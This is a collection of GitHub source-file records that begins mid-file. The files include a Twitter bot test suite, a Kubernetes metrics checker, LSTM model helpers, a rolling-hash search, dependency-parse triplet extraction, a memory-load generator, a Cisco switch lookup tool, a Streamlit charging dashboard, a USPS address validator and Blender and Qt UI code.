create_autospec\n\nfrom tweet.bills import Bill\nfrom tweet.conftest import EXAMPLE_INTRODUCTIONS\nfrom tweet.twitter import TwitterClient, TwitterBot, TwitterCredentials, TWITTER_MAX_CHARS, SHORT_URL_LENGTH, \\\n TWEET_TEMPLATE, REPLY_TEMPLATE\n\nEXAMPLE_INTRODUCTION = EXAMPLE_INTRODUCTIONS[0]\nTWEET = 'Make it illegal to put ketchup on hotdogs ' \\\n 'O2099-1111 http://chicago.legistar.com/gateway.aspx?M=F2&ID=O2099-1111'\n\n\ndef test_tweet_introductions():\n twitter_client = create_autospec(TwitterClient)\n twitter_bot = TwitterBot(twitter_client)\n\n twitter_bot.tweet_bill(EXAMPLE_INTRODUCTION)\n\n assert twitter_client.update_status.call_count == 1\n twitter_bot.twitter_client.update_status.assert_any_call(status=TWEET, in_reply_to_status_id=None)\n\n\ndef tweet_after_url_shortening(bill, reply_to=None):\n tweet_with_shortened_url = TWEET_TEMPLATE.format(\n title=bill.title,\n identifier=bill.identifier,\n url=SHORT_URL_LENGTH * 'x'\n )\n if reply_to is not None:\n tweet_with_shortened_url = REPLY_TEMPLATE.format(username=reply_to, tweet=tweet_with_shortened_url)\n return tweet_with_shortened_url\n\n\ndef test_shorten_shortening_required():\n bot = TwitterBot(TwitterCredentials('', '', '', ''))\n bill_identifier = 'O2099-1111'\n tweet_with_shortened_url = tweet_after_url_shortening(Bill(bill_identifier, '', [], ''))\n allowed_chars_excluding_url = (TWITTER_MAX_CHARS - len(tweet_with_shortened_url))\n too_long_title = 'x' * (allowed_chars_excluding_url + 1)\n bill = Bill(bill_identifier, too_long_title, '', '')\n too_many_chars_tweet = tweet_after_url_shortening(bill)\n\n shortened_bill = bot.shorten(bill)\n\n assert len(too_many_chars_tweet) == TWITTER_MAX_CHARS + 1\n assert len(tweet_after_url_shortening(shortened_bill)) == TWITTER_MAX_CHARS\n\n\ndef test_shorten_shortening_not_required():\n bot = TwitterBot(TwitterCredentials('', '', '', ''))\n bill_identifier = 'O2099-1111'\n bill_title = 'title'\n bill = Bill(bill_identifier, bill_title, '', '')\n shortened_bill = bot.shorten(bill)\n\n assert len(tweet_after_url_shortening(bill)) <= TWITTER_MAX_CHARS\n assert shortened_bill == bill\n\n\ndef test_shorten_with_reply():\n # seems like @username should not count against 280 chars, based on twitter api docs\n # however when trying to update status starting with @username it was being counted\n # against total.\n bot = TwitterBot(TwitterCredentials('', '', '', ''))\n user_name = 'username'\n bill = Bill(\n 'O2018-6573',\n 'Restructuring of debt to approve settlement payment from original owner NHS Redevelopment Corp., '\n 'and allow multiple property transfers, restructuring of City loans, affordability restrictions and '\n 'project rehabilitation agreements with new owner, Villa Capital Partners LLC and Villa Capital '\n 'Managers LLC',\n ['ordinance'],\n 'ocd-bill/c08ea55e-4017-4dfa-bfca-604b0eba0e85',\n '2018-07-25', -1\n )\n shortened_bill = bot.shorten(bill, user_name)\n\n assert len(tweet_after_url_shortening(shortened_bill, user_name)) == TWITTER_MAX_CHARS\n assert tweet_after_url_shortening(shortened_bill, user_name) == \\\n '@username Restructuring of debt to approve settlement payment from original owner NHS Redevelopment ' \\\n 'Corp., and allow multiple property transfers, restructuring of City loans, affordability restrictions and ' \\\n 'project rehabilitation agreements wi... O2018-6573 xxxxxxxxxxxxxxxxxxxxxxx'\n","repo_name":"mkrump/chicagoledger","sub_path":"tweet/tests/test_twitter.py","file_name":"test_twitter.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"74876264738","text":"import os\nfrom dotenv import load_dotenv\n\nfrom prometheus.manager import Manager\nfrom arguments.args import Args\nimport auth.dex\n\n\nargs = Args()\n\nload_dotenv(args.getEnvFileName())\n\nhostapi = os.environ.get(\"HOSTAPI\")\nrange = os.environ.get(\"RANGE\", \"1w\")\n\nsession = auth.dex.getSession()\n\ninfoMessage = (\n f\"{args.getInfo()}\\nMetrics is collected from '{hostapi}' on range '{range}'\"\n)\nprint(infoMessage)\n\nmanager = Manager(session, hostapi, range)\nmanager.collectData()\n\nif args.args.debug:\n manager.printResults()\n\nprint(\"Summary:\")\nmanager.printBalance()\nmanager.outputHtlm(infoMessage)\n","repo_name":"City-of-Helsinki/kube-resource-checker","sub_path":"kube_resource_checker.py","file_name":"kube_resource_checker.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18516257980","text":"import pickle\nimport torch\nfrom torch import nn\n\nfrom funcs_data_preprocessing import *\nfrom info_model import *\nfrom nets.LSTM import *\nfrom nets.LSTM_embed import *\n\n\ndef get_device():\n is_cuda = torch.cuda.is_available()\n if is_cuda:\n device = torch.device('cuda')\n print('GPU is available', flush=True)\n else:\n device = torch.device('cpu')\n print('GPU not available, CPU used', flush=True)\n return device\n\n\ndef get_dataInfo(modelName):\n dataInfo = dict()\n dataInfo['input_type'] = input_type[modelName]\n dataInfo['output_type'] = output_type[modelName]\n if 'iWorkerOnehot' in dataInfo['input_type']:\n _, workerIds = import_data(getWorkerIds=True)\n dataInfo['input_size'] = 28 + (len(workerIds) if 'iWorkerOnehot' in dataInfo['input_type'] else 0)\n dataInfo['output_size'] = 64\n dataInfo['num_output'] = 1\n return dataInfo\n\n\ndef get_model_filename(modelName, hyper_parameters, epoch=None):\n model_filename = modelName + '_' + '_'.join([k + str(v) for (k,v) in hyper_parameters.items()])\n if epoch is not None:\n model_filename = model_filename + '_epoch' + str(epoch) + '.p'\n return model_filename\n\n\ndef initialize_model(modelName, dataInfo, hyper_parameters):\n # Hyper-parameters\n hidden_size, n_epochs, lr_init, lr_adjust_type, batch_size = hyper_parameters['hidden_size'], hyper_parameters['n_epochs'], hyper_parameters['lr_init'], hyper_parameters['lr_adjust_type'], hyper_parameters['batch_size']\n # for embedding models\n if 'embed' in modelName:\n embed_size = hyper_parameters['embed_size']\n input_index = dict()\n input_index['gameStart'] = torch.arange(0,1)\n input_index['gameType'] = torch.arange(1,5)\n input_index['stimulus'] = torch.arange(5,26)\n input_index['reward'] = torch.arange(26,28)\n if 'iWorkerOnehot' in dataInfo['input_type']:\n _, workerIds = import_data(getWorkerIds=True)\n input_index['subjID'] = torch.arange(28,28+len(workerIds))\n \n # Instantiate the model with hyperparameters\n device = get_device()\n if modelName == 'LSTM':\n model = LSTMModel(input_size=dataInfo['input_size'], output_size=dataInfo['output_size'], hidden_size=hidden_size, num_layers=1, device=device)\n elif modelName == 'LSTM_embed':\n model = LSTM_embed_Model(input_type=dataInfo['input_type'], input_size=dataInfo['input_size'], input_index=input_index, embed_size=embed_size, output_size=dataInfo['output_size'], hidden_size=hidden_size, num_layers=1, device=device)\n \n return model","repo_name":"mingyus/RNN-cogsci2021","sub_path":"funcs_model.py","file_name":"funcs_model.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"71492914659","text":"class RollingHash(object):\n\n\tdef __init__(self):\n\n\t\tself.base = 256\n\t\tself.p = self.calculate_p()\n\t\tself.hash = 0\n\t\tself.letters = []\n\n\t\t# this is base^windowsize mod p, however needs recomputing op since window size changes\n\t\tself.magic = 1\n\n\t\t# multiplicative inverse of base mod p\n\t\tself.ibase = pow(self.base,self.p-2,self.p) % self.p\n\n\tdef calculate_p(self):\n\t\treturn self.getPrime(self.base**3)\n\n\tdef isPrime(self, X):\n\t\tfor i in range(2, int(X**0.5) + 1, 1):\n\t\t\tif X % i == 0:\n\t\t\t\t# Factor found\n\t\t\t\treturn False\n\t\treturn True\n\n\tdef getPrime(self, n):\n\t\t\tcurrent = n+1\n\t\t\twhile True:\n\t\t\t\tif self.isPrime(current):\n\t\t\t\t\treturn current\n\t\t\t\tcurrent += 1\n\n\tdef append(self, c):\n\t\tself.letters.append(c)\n\t\tself.hash = ((self.hash * self.base) + ord(c)) % self.p\n\t\tself.magic = (self.magic * self.base) % self.p\n\n\tdef skip(self, c):\n\t\tdel self.letters[0]\n\t\tself.magic = (self.magic * (self.ibase % self.p)) % self.p\n\t\tself.hash = (self.hash - (ord(c) * self.magic) + (self.p * self.base)) % self.p\n\n\tdef get_hash(self):\n\t\treturn self.hash\n\n\tdef get_window(self):\n\t\treturn self.letters\n\n\nif __name__ == '__main__':\n\n\tdef log_output(rh, op):\n\t\tprint('Operation: ' + op, 'Hash: ' + str(rh.hash), 'Ibase: ' + str(rh.ibase), 'Magic: ' + str(rh.magic), rh.get_window())\n\n\ts = 'elf'\n\tt = 'the awesome story that was unexplainable was that of the elf and the cart. the elf was very elf-like.'\n\n\tprint('')\n\tprint('pattern: ', s)\n\tprint('searchstring: ', t)\n\tprint('')\n\n\trs = RollingHash()\n\trt = RollingHash()\n\n\tfor i in range(len(s)):\n\t\trs.append(s[i])\n\t\trt.append(t[i])\n\n\tprint('prime:', rt.p)\n\tprint('')\n\n\tmatch_indexes = []\n\tfor i in range(len(s),len(t)):\n\t\trt.append(t[i])\n\t\trt.skip(t[i-len(s)])\n\t\tif rs.get_hash() == rt.get_hash():\n\t\t\tif rs.get_window() == rt.get_window():\n\t\t\t\tmatch_indexes.append((i-len(s)+1,i+1))\n\n\tprint(\n\t\tstr(len(match_indexes)) + ' match found' if len(match_indexes)==1\n\t else str(len(match_indexes)) + ' matches found' +\n\t\t (': '+str(match_indexes) if match_indexes else ''))\n\tfor m in match_indexes:\n\t\tprint(t[m[0]:m[1]])\n\n","repo_name":"letsnotgothere/introductionToAlgorithms","sub_path":"DataStructures/RollingHash.py","file_name":"RollingHash.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29137997357","text":"from xpotato.dataset.utils import default_pn_to_graph\n\nfrom tuw_nlp.graph.utils import GraphFormulaPatternMatcher\n\n\nPATTERNS = [\n # He is the brother of the composer... -> is_the_brother_of(He, composer)\n (\n \"(u_0 / .* :nsubj (u_1 / .*) :nmod (u_2 / .* :case (u_3 / of)))\",\n (0, 3),\n ((1,), (2,)),\n ),\n # The Greater Tokyo Area is the most populous metropolitan area... -> is(Area, area)\n (\n \"(u_0 / .* :nsubj (u_1 / .*) :cop (u_2 / .*))\",\n (2,),\n ((1,), (0,)),\n ),\n # The Greater Tokyo Area is the ... area in the world... -> is(A, a, in the world)\n (\n \"(u_0 / .* :nsubj (u_1 / .*) :cop (u_2 / .*) :nmod (u_3 / .* :case (u_4 / .*)))\",\n (2,),\n ((1,), (0,), (3, 4)),\n )\n]\n\n\ndef get_mapping(graph):\n return {node[\"mapping\"]: node for _, node in graph.nodes(data=True)}\n\n\ndef get_pred(head_ids, graph, all_heads):\n all_nodes = []\n for head_id in head_ids:\n nodes = [head_id]\n for i, j, data in graph.G.out_edges(head_id, data=True):\n if j in all_heads:\n continue\n # print(json.dumps(graph.to_json(), indent=4))\n if data[\"color\"] in (\"AMOD\", \"COP\", \"DET\"):\n nodes.append(j)\n all_nodes += nodes\n\n return graph.subgraph(all_nodes)\n\n\ndef get_chunk_nodes(head_id, graph, all_heads):\n nodes = [head_id]\n for i, j, data in graph.G.out_edges(head_id, data=True):\n if j in all_heads:\n continue\n # print(json.dumps(graph.to_json(), indent=4))\n if data[\"color\"] in (\"NMOD\", \"AMOD\", \"ADVMOD\", \"DET\", \"COMPOUND\", \"APPOS\", \"FLAT\", \"CASE\"):\n nodes += get_chunk_nodes(j, graph, all_heads)\n return nodes\n\n\ndef get_chunk(mapped_head_ids, graph, all_heads):\n all_nodes = []\n for mapped_head_id in mapped_head_ids:\n # print('toks:', graph.tokens, 'nodes:', graph.G.nodes(data=True), 'mapped head id:', mapped_head_id)\n nodes = get_chunk_nodes(mapped_head_id, graph, all_heads)\n all_nodes += nodes\n return graph.subgraph(all_nodes)\n\n\ndef graph_to_text(graph):\n return \" \".join(tok for tok in graph.tokens if tok is not None)\n\n\ndef ud_to_triplets(graph):\n for patt, pred_ids, args in PATTERNS:\n # print('=====================')\n # print('patt, pred_ids, args:', patt, pred_ids, args)\n # print('=====================')\n patterns = [([patt], [], True)]\n matcher = GraphFormulaPatternMatcher(\n patterns, default_pn_to_graph, case_sensitive=False\n )\n for key, patt, subgraphs in matcher.match(graph.G, return_subgraphs=True):\n for subgraph in subgraphs:\n # print('subgraph:', subgraph.nodes(data=True))\n remaining_graph = graph.copy()\n mapping = {\n data[\"mapping\"]: node for node, data in subgraph.nodes(data=True)\n }\n arg_graphs = []\n arg_heads_by_arg = []\n all_heads = set()\n for arg_ids in args:\n mapped_ids = [mapping[head_id] for head_id in arg_ids]\n arg_heads_by_arg.append(mapped_ids)\n all_heads |= set(mapped_ids)\n\n pred_heads = [mapping[pred_id] for pred_id in pred_ids]\n all_heads |= set(pred_heads)\n\n for head_ids in arg_heads_by_arg:\n # print('remaining graph:', remaining_graph.str_nodes(), 'next arg head(s):', head_ids)\n arg_graph = get_chunk(head_ids, remaining_graph, all_heads)\n # print('arg graph:', arg_graph.tokens, arg_graph.str_nodes())\n arg_graphs.append(arg_graph)\n remaining_graph.remove_graph(arg_graph)\n\n pred_graph = get_pred(pred_heads, graph, all_heads)\n # print('pred graph:', pred_graph.tokens, pred_graph.str_nodes())\n # remaining_graph.remove_graph(pred_graph)\n\n yield graph_to_text(pred_graph), [\n graph_to_text(arg_graph) for arg_graph in arg_graphs\n ]\n","repo_name":"recski/tuw-nlp","sub_path":"tuw_nlp/sem/oie/ud.py","file_name":"ud.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} +{"seq_id":"3167117978","text":"import os\nimport signal\nfrom time import sleep\nimport logging\nfrom elasticsearch import Elasticsearch\n\nimport pymongo\n\nlogging.basicConfig(level=logging.INFO)\nTARGET_LOAD = 80\nTOLERANCE = 5\n\nes = Elasticsearch([\n 'monitornode.eqos:9200'\n])\n\n\ndef waster():\n byeMemory = []\n while True:\n global shouldFill\n if shouldFill:\n byeMemory.append([0]*100000)\n\n\nif __name__ == '__main__':\n with open('hostname') as fh:\n host = fh.readline().strip()\n\n global shouldFill\n logging.info(host)\n shouldFill = True\n pids = []\n\n while True:\n\n last_perf = None\n while not last_perf:\n try:\n elasticQuery = {\n \"query\": {\n \"match\": {\n \"host\": host\n }\n }\n }\n\n query_result = es.search(index=\"performance\", filter_path=['hits.hits._source'],\n body=elasticQuery, size=1,\n sort=\"usage.time:desc\")\n\n last_perf = [x[\"_source\"] for x in query_result[\"hits\"][\"hits\"]]\n last_perf = last_perf[0] if len(last_perf) > 0 else None\n except Exception:\n logging.error(\"Status update failed\")\n\n memory = last_perf['usage']['memory']\n if memory >= 100:\n logging.info(memory)\n if memory < TARGET_LOAD - TOLERANCE:\n pid = os.fork()\n if pid == 0:\n waster()\n exit(1)\n pids.append(pid)\n logging.info('Scaled %d' % len(pids))\n\n elif memory > TARGET_LOAD + TOLERANCE:\n if not pids:\n logging.warning('Should remove a child, but none are available')\n else:\n victim = pids.pop()\n os.kill(victim, signal.SIGTERM)\n os.waitpid(victim, 0)\n logging.info('Descaled %d' % len(pids))\n else:\n logging.info(\"Memory is in ideal load\")\n sleep(5)\n","repo_name":"gcd-cloud-research/KAQoS","sub_path":"images/memorywaster/waster.py","file_name":"waster.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36943696698","text":"#!/usr/bin/env python\nimport pdb\nimport re\nfrom netmiko import ConnectHandler, NetMikoTimeoutException\n\nclass CiscoSwitchTool():\n\n\n def __init__(self,**kwargs):\n try:\n self.net_connect = ConnectHandler(**kwargs)\n self.ip = kwargs['ip']\n except:\n raise NetMikoTimeoutException\n ##############################################\n # search ARP table for mac based in IP address\n # return mac or None if not found\n ##############################################\n def mac_from_ip(self,ip_addr):\n cli_output = self.net_connect.send_command(\"sh arp | inc \" + ip_addr)\n if (cli_output == ''):\n print(\"IP Address not found \" + ip_addr)\n return None\n else:\n # interate through output\n # find the line that matches IP\n for x in cli_output.splitlines():\n entry = (x.split())\n # check for 'incomplete' mac address\n \n # check if IP matches, if true return MAC\n if entry[1] == ip_addr:\n # check for 'incomplete' mac address\n if entry[3] == 'Incomplete':\n return None\n else:\n return entry[3]\n\n #############################################\n # Search mac-address table for mac address\n # return port or None if not found\n #############################################\n def port_from_mac(self,mac_addr):\n cli_output = self.net_connect.send_command(\"sh mac add | inc \" + mac_addr)\n if (cli_output == \"\"):\n print(\"MAC Address not found\")\n return None\n else:\n for x in cli_output.splitlines():\n entry = x.split()\n print(entry)\n return entry[3]\n #############################################\n # gather information about a channel-group\n # return list of ports in group\n #############################################\n def ports_from_etherchannel(self,channel_group_num):\n port_list = []\n command = 'sh etherchannel {} detail'.format(channel_group_num)\n output = self.net_connect.send_command(command)\n for line in output.splitlines():\n m = re.search('^Port: (.*)', line)\n if m is not None:\n port_list.append(m.group(1))\n \n return port_list\n #######################################################\n # find CDP neighbor on port\n # function returns tuple with name,ip of CDP neighbor\n #######################################################\n def find_cdp_neighbor(self,port):\n command = 'sh cdp neighbors {} detail'.format(port)\n output = self.net_connect.send_command(command)\n if output == \"\":\n return None\n else:\n name = ''\n ip_addr = ''\n for line in output.splitlines():\n m1 = re.search('^Device ID: (.*)', line)\n m2 = re.search('^ IP address: (.*)', line)\n if m1 is not None:\n name = m1.group(1)\n elif m2 is not None:\n ip_addr = m2.group(1)\n \n return ((name, ip_addr))\n \n ####################################\n # run functions to find port for IP\n # returns port or None if not found\n # IP must be in switch ARP table\n ####################################\n def port_from_ip(self,ip_addr):\n mac_addr = self.mac_from_ip(ip_addr)\n if mac_addr is None:\n return None\n port = self.port_from_mac(mac_addr)\n return (port)\n\n ####################################\n # return the hostname of device\n ####################################\n def get_switch_name(self):\n #command = 'show run | inc hostname'\n #output = self.net_connect.send_command(command)\n #pdb.set_trace()\n output = self.net_connect.find_prompt()\n #pdb.set_trace()\n return output.strip('#')\n\n","repo_name":"km0420j/NetTools","sub_path":"switch_tool/cisco_switch_tool.py","file_name":"cisco_switch_tool.py","file_ext":"py","file_size_in_byte":4065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9961546797","text":"def selection_sort(nums: list[int]):\n \"\"\"选择排序\"\"\"\n # 外循环:未排序区间为 [i, n-1]\n for i in range(len(nums) - 1):\n min_index = i\n # 内循环:找到未排序区间内的最小元素\n for j in range(i + 1, len(nums)):\n if nums[j] < nums[min_index]:\n min_index = j\n nums[i], nums[min_index] = nums[min_index], nums[i]\n\nif __name__ == '__main__':\n nums = [1, 7, 6, 3, 2]\n selection_sort(nums)\n print(nums)","repo_name":"FanMagnum/hello-algorithms","sub_path":"sort/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31886165962","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 13 22:25:33 2022\n\n@author: kyrie\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n#scatter chart plotly\nimport plotly.express as px\n\ncolor = sns.color_palette(\"viridis\")\n\n\ndf = pd.read_csv(r\"C:\\Users\\kyrie\\ironhack\\project5\\clean_data_project5.csv\")\n\n\ndfcolumns = df.columns\ndaycount = df['weekday'].value_counts()\ndf['managerVehicle']= df['managerVehicle'].replace(1,'Yes')\ndf['managerVehicle']= df['managerVehicle'].replace(0,'No')\n\nimport streamlit as st\nst.set_option('deprecation.showPyplotGlobalUse', False)\n\n\n\n### Title of the page\nst.markdown(\n\t\"

    Project 5

    \",\n\tunsafe_allow_html=True,\n)\n\nfrom PIL import Image\nimage = Image.open(r\"C:\\Users\\kyrie\\Downloads\\carr.jpg\")\n#center the image in the middle of the page\ncol1, col2, col3 = st.columns([0.2, 5, 0.2])\ncol2.image(image, use_column_width=True)\n\n###################################################################################\n## SECTION 1\nst.markdown(\"## Charger Type\")\n\n# filter the data for\nclist = df[\"facilityType\"].unique()\nst.sidebar.markdown(\"## charger Type: \")\nfacilityType = st.sidebar.selectbox(\"Select a facility Type: \", clist)\nfilter1 = df[df[\"facilityType\"] == facilityType]\n\n\n########## METRICS INDICATORS\nm1, m2, m3, m4 = st.columns((1, 1, 1, 1))\nmean_payments = round(filter1[\"dollars\"].mean(), 1)\nmean_kwh = round(filter1[\"kwhTotal\"].mean(), 1)\nmean_charging_times = round(filter1[\"chargeTimeHrs\"].mean(), 1)\nfacilityType_count = filter1[\"facilityType\"].count()\n\nm1.metric(label=\"facilty Type count\", value=facilityType_count)\nm2.metric(label=\"average payment\", value=str(float(mean_payments)) + \" $\")\nm3.metric(label=\"average kwh\", value=str(float(mean_kwh)) + \" Kwh\")\nm4.metric(label=\"Average charging time\", value=str(float(mean_charging_times)) + \" Hours\")\n\n\n## SECTION 2\nst.sidebar.markdown(\"Payment Platform\")\nst.markdown(\"## Payment Platform\")\n\n# filter the data for\nclist = df[\"platform\"].unique()\nplatform = st.sidebar.selectbox(\"Select a platform: \", clist)\nfilter2 = df[df[\"platform\"] == platform]\n\n\n########## METRICS INDICATORS\nmm1, mm2, mm3, mm4 = st.columns((1, 1, 1, 1))\nmean_payments = round(filter2[\"dollars\"].mean(), 1)\nmean_kwh = round(filter2[\"kwhTotal\"].mean(), 1)\nmean_charging_times = round(filter2[\"chargeTimeHrs\"].mean(), 1)\nplatform_count = filter2[\"platform\"].count()\n\nmm1.metric(label=\"platform\", value=platform_count)\nmm2.metric(label=\"average payment\", value=str(float(mean_payments)) + \" $\")\nmm3.metric(label=\"average kwh\", value=str(float(mean_kwh)) + \" Kwh\")\nmm4.metric(label=\"Average charging time\", value=str(float(mean_charging_times)) + \" Hours\")\n\n#####################################################################\n\nst.markdown(\"## day of Charging\")\n\ndfpie = pd.DataFrame({'day': ['Fri','Mon','Sat','Sun','Thu','tue','Wed'], 'count': [610, 615, 62, 24,735,635,713]},\n index = [1, 2, 3, 4, 5, 6, 7])\nfig18 = px.pie(dfpie, values='count', names='day', color_discrete_sequence=px.colors.sequential.Viridis)\nst.plotly_chart(fig18)\n#############\n\ndf['index_col'] = df.index\n\nchoix = st.sidebar.selectbox(\"Select one variable to heatmap\", ['price', 'kwh_Total','charging_Hour'])\n\nif choix == \"price\":\n st.title(\"heatmap of the price distribution\")\n fig5 = px.density_heatmap(\n data_frame=df, y=\"index_col\", x=\"dollars\"\n )\n st.plotly_chart(fig5)\n \nif choix == \"kwh_Total\":\n fig6 = px.density_heatmap(\n data_frame=df, y=\"index_col\", x=\"kwhTotal\"\n )\n st.plotly_chart(fig6)\n \nif choix == 'charging_Hour':\n st.title(\"heatmap of the price distribution\")\n fig7 = px.density_heatmap(\n data_frame=df, y=\"index_col\", x=\"startTime\"\n )\n st.plotly_chart(fig7)\n\n\n\n\n## SECTION 3\n\nst.markdown(\"## additional Bar chart of the charge time, the price and the electricity quantity\")\n\nchart_data = pd.DataFrame(\n df[['chargeTimeHrs','kwhTotal', 'dollars']].head(60),\n columns=[\"chargeTimeHrs\", \"kwhTotal\", \"dollars\"])\nst.bar_chart(chart_data)\n\n\n\n\n#df['weekday'].value_counts().index\n\n\n\n\n#create two columns with the two scatter plots\nfig_col1, fig_col2 = st.columns(2)\n\ndf['col3'] = np.arange(len(df))*0.05\n\nwith fig_col1:\n st.markdown(\n \t\"

    charge time depending on the charger type

    \",\n \tunsafe_allow_html=True,\n )\n fig3 = px.scatter(df, x='facilityType', y='chargeTimeHrs',size = 'col3') \n st.plotly_chart(fig3)\n\n\nwith fig_col2:\n st.markdown(\n \t\"

    price depending on the charge time

    \",\n \tunsafe_allow_html=True,\n )\n fig2 = px.scatter(df, x='dollars', y='chargeTimeHrs', size ='col3') \n st.plotly_chart(fig2)\n\n \n\n\nmanager_unique = df['managerVehicle'].unique()\nfiltre = st.sidebar.selectbox(\"Manager Vehicle ? \", manager_unique)\nmanager = df[df['managerVehicle']== filtre]\n\n#pi = manager.groupby(['facilityType'])['managerVehicle'].count()\n\nlabel = ['Type 1','Type 2','Type 3','Type 4']\ny = manager.groupby(['facilityType'])['managerVehicle'].count()\n#plt.style.use('seaborn-colorblind')\nfig1, ax1 = plt.subplots()\nax1.pie(y, labels=label, colors = color, autopct='%1.0f%%')\nplt.title('repartiton of the charger Type')\n\n\n\n\nst.pyplot()\n\n\n\n\n\n\n \n \n","repo_name":"bktraore/Ironhack_Project5_Electriccars_dataViz_streamlit","sub_path":"project5/project5_cleaning.py","file_name":"project5_cleaning.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29886226280","text":"from collections import OrderedDict\nfrom lxml import etree, objectify\nfrom lxml.builder import E\n\nfrom api import BaseAPI\nfrom exceptions import USPSInvalidAddress\n\n\nclass AddressValidation(BaseAPI):\n \"Implements the Address Validation\"\n\n @classmethod\n def address_request_type(cls, id='0', **kwargs):\n \"\"\"\n Builds a AddressValidation xml from the given lxml elements\n\n API Docs:\n https://www.usps.com/business/web-tools-apis/address-information-api.htm\n\n Request:\n \n
    \n XYZ Corp.\n \n 6406 Ivy \n Greenbelt\n MD\n \n \n
    \n
    \n\n Response:\n \n
    \n XYZ Corp.\n 6406 IVY LN\n GREENBELT\n MD\n 20770\n 1441\n
    \n
    \n\n :param FirmName: U.S. city to be validated. (A valid city/state/postal\n code combination must be included as input)\n :param Address1: State to be validated. (A valid\n city/state/postal code combination must be\n included as input)\n :param Address2: Country code 2 Digits\n :param City: Postal code\n :param State: Postal code\n ::\n \"\"\"\n # USPS excpected elements to be in order\n values = OrderedDict((\n ('FirmName', ''),\n ('Address1', ''),\n ('Address2', ''),\n ('City', ''),\n ('State', ''),\n ('Zip5', ''),\n ('Zip4', ''),\n ))\n values.update(kwargs)\n elements = cls.make_elements([], [], values)\n return E.Address(*elements, ID=id)\n\n def look_for_error(self, response):\n \"\"\"\n Look for address specific errors in response\n \"\"\"\n super(AddressValidation, self).look_for_error(response)\n\n # Look for address specific error\n try:\n error = response.Address.Error\n except AttributeError:\n return None\n else:\n raise USPSInvalidAddress(\"%s-%s:%s\" % (\n error.Source,\n error.Number,\n error.Description,\n ), response)\n\n def request(self, address_type):\n \"\"\"\n Calls up USPS and send the request. Get the returned response and\n return an element built out of it.\n\n :param address_type: lxml element with data for the address request\n type\n \"\"\"\n full_address_type = E.AddressValidateRequest(\n address_type, USERID=self.username\n )\n full_request = etree.tostring(full_address_type)\n\n # Send the request\n result = self.send_request(\n self.urls['secure'],\n api_type='Verify',\n data_xml=full_request\n )\n response = objectify.fromstring(result)\n self.look_for_error(response)\n return response\n","repo_name":"openlabs/trytond-shipping-usps","sub_path":"usps/address_validation.py","file_name":"address_validation.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30461587693","text":"# \n\n# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nimport bpy\n\n__author__ = \"Nutti \"\n__status__ = \"production\"\n__version__ = \"3.2\"\n__date__ = \"20 Jun 2015\"\n\nfrom . import cpuv_default_operation\nfrom . import cpuv_selseq_operation\nfrom . import cpuv_uvmap_operation\nfrom . import cpuv_fliprot_operation\nfrom . import cpuv_transfer_uv_operation\n\n\n# master menu\nclass CPUVMenu(bpy.types.Menu):\n bl_idname = \"uv.cpuv_menu\"\n bl_label = \"Copy/Paste UV\"\n bl_description = \"Copy and Paste UV Menu\"\n\n def draw(self, context):\n self.layout.operator(cpuv_default_operation.CPUVCopyUV.bl_idname)\n self.layout.operator(cpuv_default_operation.CPUVPasteUV.bl_idname)\n self.layout.operator(cpuv_selseq_operation.CPUVSelSeqCopyUV.bl_idname)\n self.layout.operator(cpuv_selseq_operation.CPUVSelSeqPasteUV.bl_idname)\n self.layout.menu(cpuv_uvmap_operation.CPUVUVMapCopyUV.bl_idname)\n self.layout.menu(cpuv_uvmap_operation.CPUVUVMapPasteUV.bl_idname)\n self.layout.operator(cpuv_fliprot_operation.CPUVFlipRotate.bl_idname)\n self.layout.operator(\n cpuv_transfer_uv_operation.CPUVTransferUVCopy.bl_idname)\n self.layout.operator(\n cpuv_transfer_uv_operation.CPUVTransferUVPaste.bl_idname)\n","repo_name":"mkbreuer/ToolPlus","sub_path":"2.78/Sets/toolplus_display/uv_magic/cpuv_menu.py","file_name":"cpuv_menu.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"34"} +{"seq_id":"12600151740","text":"import gc\n\nfrom CroutDecomposition import *\nfrom GaussElimination import *\nfrom JacobiGaussSeidel import *\nfrom answer import *\nfrom Cheloskey import *\nfrom LUDecomposition import *\n\ndimension = 3\nmethod = 0\nreadX = False\nanswer = ''\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n 